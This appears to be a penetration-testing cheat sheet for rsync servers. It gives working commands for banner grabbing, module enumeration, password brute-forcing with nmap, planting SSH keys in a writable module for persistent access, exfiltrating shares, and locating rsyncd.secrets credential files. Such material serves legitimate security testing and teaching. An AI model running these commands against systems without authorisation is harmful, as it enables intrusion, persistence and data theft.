Rsync

To initiate a connection with an rsync server, use the rsync command followed by the rsync URL.

# The URL format is `[rsync://][user@]host[:port]/module.``
rsync rsync://user@target_host/

You can use Netcat to find out what service is running and its version by looking at the welcome message it shows when you connect. This method is called Banner Grabbing.

nc -nv <IP> 873

# Expected output format
@RSYNCD: version

You can use Nmap to check if there's an Rsync server on a target host like this:

nmap -p 873 <IP>

We can then enumerate modules. Thus is a crucial enumeration phase to understand the structure of the target rsync module and finding misconfigurations or sensitive information.

nmap -sV --script "rsync-list-modules" -p 873 target_host

Rsync modules represent directory shares and may be protected with a password. To list these modules:

rsync target_host::

For detailed enumeration of a specific module to see files and permissions:

rsync -av --list-only rsync://target_host/module_name

Be aware that some shares might be restricted to specific credentials, indicated by an "Access Denied" message. We can try to bruteforce the password using following command.

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

Modules without proper authentication can be accessed by unauthorized users. This vulnerability allows attackers to read, modify, or delete sensitive data.

If a module is writable, and you have determined its path through enumeration, you can upload malicious files, potentially leading to remote command execution or pivoting into the network.

Upload artifacts like modified scripts or binaries to maintain access:

rsync -av home_user/.ssh/ rsync://user@target_host/home_user/.ssh

Sensitive data identified during enumeration can be exfiltrated using rsync:

From Remote to Local

We can sync a remote folder with a local folder.

rsync -avz rsync://<IP>:873/share_name /local/directory/
# OR
rsync -avz <IP>::share_name /local/directory/

From Local to Remote*

We can sync our local folder with a remote folder.

rsync -av /local/directory/ <IP>::share_name
# OR
rsync -av /local/directory/ rsync://<IP>:873/share_name 

To locate the rsyncd configuration file and potentially find a secrets file containing usernames and passwords for rsyncd authentication, use the following command:

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)